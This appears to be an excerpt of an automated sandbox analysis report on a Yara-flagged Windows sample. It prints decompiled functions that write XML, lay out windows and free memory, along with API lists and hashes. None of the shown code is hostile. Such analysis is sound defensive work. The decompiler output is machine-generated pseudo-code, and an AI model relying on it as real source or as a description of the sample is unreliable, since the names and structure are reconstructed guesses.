                                                                                • Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E00409695(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                				void _v259;
                                                                                				char _v260;
                                                                                				signed int _t34;
                                                                                				char* _t45;
                                                                                				void* _t47;
                                                                                
                                                                                				E00405EFD(_a4, "<item>\r\n");
                                                                                				_t34 = 0;
                                                                                				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
                                                                                					do {
                                                                                						_v260 = 0;
                                                                                						memset( &_v259, 0, 0xfe);
                                                                                						E0040F09D( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
                                                                                						_t45 =  &_v260;
                                                                                						E00409018(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
                                                                                						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
                                                                                						E00405EFD(_a4,  *(__edi + 0x54));
                                                                                						_t47 = _t47 + 0x28;
                                                                                						_t34 = _t34 + 1;
                                                                                					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
                                                                                				}
                                                                                				return E00405EFD(_a4, "</item>\r\n");
                                                                                			}









                                                                                APIs
                                                                                  • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                  • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                                • memset.MSVCRT ref: 004096CB
                                                                                  • Part of subcall function 0040F09D: memcpy.MSVCRT ref: 0040F10B
                                                                                  • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                  • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                • sprintf.MSVCRT ref: 00409710
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                • API String ID: 3200591283-2769808009
                                                                                • Opcode ID: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                • Instruction ID: f0c093cdac9801847eaa7418f237768de61d650e358e632480a4b045718b8cde
                                                                                • Opcode Fuzzy Hash: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                • Instruction Fuzzy Hash: FE11E731500515BFC711AF25CC42E967B64FF04318F10006AF549369A2EB76BA64DFD8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00407BF9(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                				intOrPtr _v12;
                                                                                				struct tagPOINT _v20;
                                                                                				struct tagRECT _v36;
                                                                                				int _t27;
                                                                                				struct HWND__* _t30;
                                                                                				struct HWND__* _t32;
                                                                                
                                                                                				_t30 = _a4;
                                                                                				if((_a8 & 0x00000001) != 0) {
                                                                                					_t32 = GetParent(_t30);
                                                                                					GetWindowRect(_t30,  &_v20);
                                                                                					GetClientRect(_t32,  &_v36);
                                                                                					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                					_t27 = _v36.right - _v12 - _v36.left;
                                                                                					_v20.x = _t27;
                                                                                					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                				}
                                                                                				if((_a8 & 0x00000002) != 0) {
                                                                                					E00406560(_t30);
                                                                                				}
                                                                                				return 1;
                                                                                			}










                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 00407C0B
                                                                                • GetWindowRect.USER32 ref: 00407C18
                                                                                • GetClientRect.USER32 ref: 00407C23
                                                                                • MapWindowPoints.USER32 ref: 00407C33
                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407C4F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                • String ID:
                                                                                • API String ID: 4247780290-0
                                                                                • Opcode ID: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                • Instruction ID: 06ac4e87c023cdd11bbb76a881eefb098f7857fbb12a9e12d40a619b69e20d01
                                                                                • Opcode Fuzzy Hash: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                • Instruction Fuzzy Hash: A7014C32800129BBDB119BA5DD89EFF7FBCEF46750F048129F901E2150D7B89541CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040A4C8(void* __eax) {
                                                                                				void* __esi;
                                                                                				void* _t16;
                                                                                				void* _t33;
                                                                                				void* _t38;
                                                                                				void* _t41;
                                                                                
                                                                                				_t41 = __eax;
                                                                                				_t16 = E00401033();
                                                                                				if(_t16 == 0x5cb8) {
                                                                                					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 0, 0);
                                                                                					E00405E2C();
                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)) + 0x28)) = 0;
                                                                                					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0x1009, 0, 0);
                                                                                					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x5c))(_t38, _t33);
                                                                                					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x74))(1);
                                                                                					E0040A437(_t41);
                                                                                					SetCursor( *0x416b98);
                                                                                					SetFocus( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184));
                                                                                					return SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 1, 0);
                                                                                				}
                                                                                				return _t16;
                                                                                			}









                                                                                APIs
                                                                                • SendMessageA.USER32 ref: 0040A4F5
                                                                                  • Part of subcall function 00405E2C: LoadCursorA.USER32 ref: 00405E33
                                                                                  • Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A
                                                                                • SendMessageA.USER32 ref: 0040A518
                                                                                  • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
                                                                                  • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
                                                                                  • Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                  • Part of subcall function 0040A437: SendMessageA.USER32 ref: 0040A4C0
                                                                                • SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
                                                                                • SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
                                                                                • SendMessageA.USER32 ref: 0040A566
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                                                • String ID:
                                                                                • API String ID: 2210206837-0
                                                                                • Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                • Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
                                                                                • Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                • Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00409867(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                				void _v259;
                                                                                				char _v260;
                                                                                				void _v515;
                                                                                				char _v516;
                                                                                				void* __esi;
                                                                                				void* _t17;
                                                                                				intOrPtr* _t26;
                                                                                				char* _t28;
                                                                                
                                                                                				_t26 = __ecx;
                                                                                				_v260 = 0;
                                                                                				memset( &_v259, 0, 0xfe);
                                                                                				_v516 = 0;
                                                                                				memset( &_v515, 0, 0xfe);
                                                                                				E00405EFD(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
                                                                                				_t28 =  &_v260;
                                                                                				E00409018(_t28, _t17);
                                                                                				sprintf( &_v516, "<%s>\r\n", _t28);
                                                                                				return E00405EFD(_a4,  &_v516);
                                                                                			}

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040988A
                                                                                • memset.MSVCRT ref: 004098A0
                                                                                  • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                  • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                                  • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                  • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                • sprintf.MSVCRT ref: 004098D7
                                                                                Strings
                                                                                • <%s>, xrefs: 004098D1
                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                • API String ID: 3202206310-1998499579
                                                                                • Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                • Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
                                                                                • Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                • Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 76%
                                                                                			E00408572(void* __esi) {
                                                                                				intOrPtr _t9;
                                                                                				intOrPtr _t10;
                                                                                				intOrPtr _t11;
                                                                                				intOrPtr* _t18;
                                                                                				void* _t19;
                                                                                
                                                                                				_t19 = __esi;
                                                                                				_t9 =  *((intOrPtr*)(__esi + 0x24));
                                                                                				if(_t9 != 0) {
                                                                                					_push(_t9);
                                                                                					L004115D6();
                                                                                				}
                                                                                				_t10 =  *((intOrPtr*)(_t19 + 0x34));
                                                                                				if(_t10 != 0) {
                                                                                					_push(_t10);
                                                                                					L004115D6();
                                                                                				}
                                                                                				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
                                                                                				if(_t11 != 0) {
                                                                                					_push(_t11);
                                                                                					L004115D6();
                                                                                				}
                                                                                				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
                                                                                				if(_t18 != 0) {
                                                                                					_t11 =  *_t18;
                                                                                					if(_t11 != 0) {
                                                                                						_push(_t11);
                                                                                						L004115D6();
                                                                                						 *_t18 = 0;
                                                                                					}
                                                                                					_push(_t18);
                                                                                					L004115D6();
                                                                                				}
                                                                                				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
                                                                                				 *((intOrPtr*)(_t19 + 0x24)) = 0;
                                                                                				 *((intOrPtr*)(_t19 + 0x34)) = 0;
                                                                                				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
                                                                                				return _t11;
                                                                                			}

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                • Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
                                                                                • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                • Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 70%
                                                                                			E004085D8(intOrPtr* __edi) {
                                                                                				void* __esi;
                                                                                				void** _t7;
                                                                                				intOrPtr* _t12;
                                                                                				intOrPtr* _t18;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
                                                                                				intOrPtr _t23;
                                                                                				intOrPtr _t24;
                                                                                
                                                                                				_t18 = __edi;
                                                                                				 *__edi = 0x413320;
                                                                                				E00408572(__edi);
                                                                                				_t21 =  *((intOrPtr*)(__edi + 0x10));
                                                                                				if(_t21 != 0) {
                                                                                					E00406B5B(_t21);
                                                                                					_push(_t21);
                                                                                					L004115D6();
                                                                                				}
                                                                                				_t22 =  *((intOrPtr*)(_t18 + 0xc));
                                                                                				if(_t22 != 0) {
                                                                                					E00406B5B(_t22);
                                                                                					_push(_t22);
                                                                                					L004115D6();
                                                                                				}
                                                                                				_t23 =  *((intOrPtr*)(_t18 + 8));
                                                                                				if(_t23 != 0) {
                                                                                					E00406B5B(_t23);
                                                                                					_push(_t23);
                                                                                					L004115D6();
                                                                                				}
                                                                                				_t24 =  *((intOrPtr*)(_t18 + 4));
                                                                                				if(_t24 != 0) {
                                                                                					E00406B5B(_t24);
                                                                                					_push(_t24);
                                                                                					L004115D6();
                                                                                				}
                                                                                				_t12 = _t18;
                                                                                				_t7 =  *((intOrPtr*)( *_t12))();
                                                                                				free( *_t7);
                                                                                				return _t7;
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004085F3
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00408606
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00408619
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040862C
                                                                                • free.MSVCRT(00000000), ref: 00408640
                                                                                  • Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??3@$free
                                                                                • String ID:
                                                                                • API String ID: 2241099983-0
                                                                                • Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                • Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
                                                                                • Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                • Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 19%
                                                                                			E0040E81A(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
                                                                                				void* __esi;
                                                                                				void* _t11;
                                                                                				void* _t26;
                                                                                				void* _t27;
                                                                                
                                                                                				_t26 = __edx;
                                                                                				_t11 = _a4 - 0x110;
                                                                                				_t27 = __ecx;
                                                                                				if(_t11 == 0) {
                                                                                					E0040E4A4(__ecx, __ecx, __eflags);
                                                                                					E00406491(_t26,  *((intOrPtr*)(__ecx + 4)));
                                                                                					L5:
                                                                                					return E004015AE(_t27, _a4, _a8, _a12);
                                                                                				}
                                                                                				if(_t11 != 0x28 || E004062D1(_a12) == 0) {
                                                                                					goto L5;
                                                                                				} else {
                                                                                					SetBkMode(_a8, 1);
                                                                                					SetBkColor(_a8, GetSysColor(5));
                                                                                					SetTextColor(_a8, 0xc00000);
                                                                                					return GetSysColorBrush(5);
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
                                                                                  • Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                                  • Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040E841
                                                                                • GetSysColor.USER32(00000005), ref: 0040E849
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0040E853
                                                                                • SetTextColor.GDI32(?,00C00000), ref: 0040E861
                                                                                • GetSysColorBrush.USER32(00000005), ref: 0040E869
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                                                • String ID:
                                                                                • API String ID: 1869857563-0
                                                                                • Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                                • Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
                                                                                • Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                                • Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E0040B105(intOrPtr __ecx, short _a4, short _a8) {
                                                                                				char _v265;
                                                                                				char _v520;
                                                                                				char _v532;
                                                                                				RECT* _v540;
                                                                                				char _v560;
                                                                                				intOrPtr _v564;
                                                                                				char _v568;
                                                                                				intOrPtr _v572;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				int _t54;
                                                                                				void* _t77;
                                                                                				short _t85;
                                                                                				short _t86;
                                                                                				RECT* _t97;
                                                                                				intOrPtr _t104;
                                                                                
                                                                                				_t93 = __ecx;
                                                                                				_t97 = 0;
                                                                                				_t104 = __ecx;
                                                                                				_v564 = __ecx;
                                                                                				if(_a4 == 0 || _a4 == 1) {
                                                                                					_t85 = _a8;
                                                                                					if(_t85 == 0x9c42) {
                                                                                						_t54 = DestroyWindow( *(_t104 + 0x108));
                                                                                					}
                                                                                					_t114 = _t85 - 0x9c49;
                                                                                					if(_t85 == 0x9c49) {
                                                                                						_t54 = E0040AEAA(_t93, _t97, _t104, _t114);
                                                                                					}
                                                                                					_t115 = _t85 - 0x9c59;
                                                                                					if(_t85 == 0x9c59) {
                                                                                						_t54 = E0040AE70(_t97, _t104, _t115);
                                                                                					}
                                                                                					_t116 = _t85 - 0x9c56;
                                                                                					if(_t85 == 0x9c56) {
                                                                                						_t54 = E0040ADB3(_t104, _t116);
                                                                                					}
                                                                                					if(_a8 == 0x9c58) {
                                                                                						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
                                                                                						_t54 = E0040A27F(0, _t93, _t104, 0);
                                                                                					}
                                                                                					if(_a8 == 0x9c44) {
                                                                                						_t54 = E0040AD9D(_t104);
                                                                                					}
                                                                                					if(_a8 == 0x9c43) {
                                                                                						_v532 = 0x413560;
                                                                                						E00401000(_t93,  &_v520, 0x412404);
                                                                                						E00401000(_t93,  &_v265, 0x412440);
                                                                                						_t104 = _v564;
                                                                                						_push( *(_t104 + 0x108));
                                                                                						_push( &_v532);
                                                                                						_t77 = 0x70;
                                                                                						E00401540(_t77);
                                                                                						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
                                                                                						_t20 =  &_v540; // 0x413560
                                                                                						_t54 = E0040143D(_t20);
                                                                                						_t97 = 0;
                                                                                					}
                                                                                					_t86 = _a8;
                                                                                					_t122 = _t86 - 0x9c41;
                                                                                					if(_t86 == 0x9c41) {
                                                                                						_t54 = E0040AD38(_t104, _t93, _t122);
                                                                                					}
                                                                                					if(_t86 != 0x9c47) {
                                                                                						L23:
                                                                                						__eflags = _t86 - 0x9c4f;
                                                                                						if(_t86 != 0x9c4f) {
                                                                                							L27:
                                                                                							__eflags = _t86 - 0x9c48;
                                                                                							if(_t86 == 0x9c48) {
                                                                                								_t54 = E0040AC8A(_t104, _t86);
                                                                                							}
                                                                                							__eflags = _t86 - 0x9c45;
                                                                                							if(__eflags == 0) {
                                                                                								_t100 = _t104 + 0x36c;
                                                                                								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
                                                                                								E0040A27F(0, _t93, _t104, __eflags);
                                                                                								_t93 = 1;
                                                                                								_t54 = E0040A00B( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
                                                                                								_t97 = 0;
                                                                                								__eflags = 0;
                                                                                							}
                                                                                							__eflags = _a8 - 0x9c46;
                                                                                							if(__eflags == 0) {
                                                                                								_t54 = E0040B095(_t104, __eflags, _t97);
                                                                                							}
                                                                                							__eflags = _a8 - 0x9c5c;
                                                                                							if(_a8 == 0x9c5c) {
                                                                                								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
                                                                                								__eflags = 0;
                                                                                								E0040A27F(0, _t93, _t104, 0);
                                                                                								E0040A437(_t104);
                                                                                								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
                                                                                							}
                                                                                							__eflags = _a8 - 0x9c4a;
                                                                                							if(__eflags == 0) {
                                                                                								_t54 = E0040B095(_t104, __eflags, 1);
                                                                                							}
                                                                                							__eflags = _a8 - 0x9c4b;
                                                                                							if(_a8 == 0x9c4b) {
                                                                                								_v540 = _t97;
                                                                                								_v560 = 0x412ff4;
                                                                                								E00405960( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
                                                                                								_v568 = 0x412ff4;
                                                                                								_t54 = E0040143D( &_v560);
                                                                                								_t104 = _v572;
                                                                                							}
                                                                                							__eflags = _a8 - 0x9c4c;
                                                                                							if(_a8 == 0x9c4c) {
                                                                                								_t54 = E00408C3E( *((intOrPtr*)(_t104 + 0x370)));
                                                                                							}
                                                                                							__eflags = _a8 - 0x9c4e;
                                                                                							if(_a8 == 0x9c4e) {
                                                                                								_t54 = E00409C78( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
                                                                                							}
                                                                                							goto L43;
                                                                                						}
                                                                                						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                                                						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
                                                                                						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
                                                                                							_t54 = E00408654(_t72, 0xffffffff, _t97, 2);
                                                                                							goto L27;
                                                                                						}
                                                                                						_push(0xf000);
                                                                                						_push(0x1000);
                                                                                						goto L21;
                                                                                					} else {
                                                                                						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                                                						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
                                                                                							_t54 = E00408654(_t72, 0xffffffff, 2, 2);
                                                                                							goto L23;
                                                                                						}
                                                                                						_push(0xf000);
                                                                                						_push(0x2000);
                                                                                						L21:
                                                                                						_push(0xffffffff);
                                                                                						_t54 = E00408654(_t72);
                                                                                						goto L43;
                                                                                					}
                                                                                				} else {
                                                                                					L43:
                                                                                					return _t54;
                                                                                				}
                                                                                			}





















                                                                                APIs
                                                                                • DestroyWindow.USER32(?), ref: 0040B13E
                                                                                • SetFocus.USER32(?,?,?), ref: 0040B1E4
                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DestroyFocusInvalidateRectWindow
                                                                                • String ID: `5A
                                                                                • API String ID: 3502187192-343712130
                                                                                • Opcode ID: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                • Instruction ID: 7dc3b259c8ef6dbe6f4b6ee630ad47b8a618685bd7b93527759b10f323b3e488
                                                                                • Opcode Fuzzy Hash: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                • Instruction Fuzzy Hash: 2B519130A043019BCB25BF658845E9AB3E0EF54724F44C57FF4696F2E1CB7999818B8E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E00405CEE(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                				struct HDWP__* _v8;
                                                                                				intOrPtr _v12;
                                                                                				void* __ebx;
                                                                                				intOrPtr _t29;
                                                                                				struct HDWP__* _t30;
                                                                                				RECT* _t58;
                                                                                				intOrPtr _t66;
                                                                                
                                                                                				_push(__ecx);
                                                                                				_push(__ecx);
                                                                                				_t66 = __ecx;
                                                                                				_v12 = __ecx;
                                                                                				if(_a4 != 5) {
                                                                                					if(_a4 != 0x24) {
                                                                                						if(_a4 == 0xf) {
                                                                                							E0040173B(__ecx + 0xc);
                                                                                						}
                                                                                					} else {
                                                                                						_t29 = _a12;
                                                                                						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
                                                                                						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
                                                                                					}
                                                                                				} else {
                                                                                					_t30 = BeginDeferWindowPos(0xb);
                                                                                					_t58 = _t66 + 0xc;
                                                                                					_v8 = _t30;
                                                                                					E0040169B(_t58, _t30, 0x3ed, 0, 0, 1);
                                                                                					E0040169B(_t58, _v8, 0x3ee, 0, 0, 1);
                                                                                					E0040169B(_t58, _v8, 0x3f4, 0, 0, 1);
                                                                                					E0040169B(_t58, _v8, 0x3ef, 0, 0, 1);
                                                                                					E0040169B(_t58, _v8, 0x3f0, 1, 0, 0);
                                                                                					E0040169B(_t58, _v8, 0x3f1, 1, 0, 0);
                                                                                					E0040169B(_t58, _v8, 0x3f5, 1, 0, 0);
                                                                                					E0040169B(_t58, _v8, 0x3f2, 1, 0, 0);
                                                                                					E0040169B(_t58, _v8, 0x3f3, 1, 1, 0);
                                                                                					E0040169B(_t58, _v8, 1, 1, 1, 0);
                                                                                					E0040169B(_t58, _v8, 2, 1, 1, 0);
                                                                                					EndDeferWindowPos(_v8);
                                                                                					InvalidateRect( *(_t58 + 0x10), _t58, 1);
                                                                                					_t66 = _v12;
                                                                                				}
                                                                                				return E004015AE(_t66, _a4, _a8, _a12);
                                                                                			}











                                                                                APIs
                                                                                • BeginDeferWindowPos.USER32 ref: 00405D07
                                                                                  • Part of subcall function 0040169B: GetDlgItem.USER32 ref: 004016AB
                                                                                  • Part of subcall function 0040169B: GetClientRect.USER32 ref: 004016BD
                                                                                  • Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727
                                                                                • EndDeferWindowPos.USER32(?), ref: 00405DD8
                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 00405DE3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
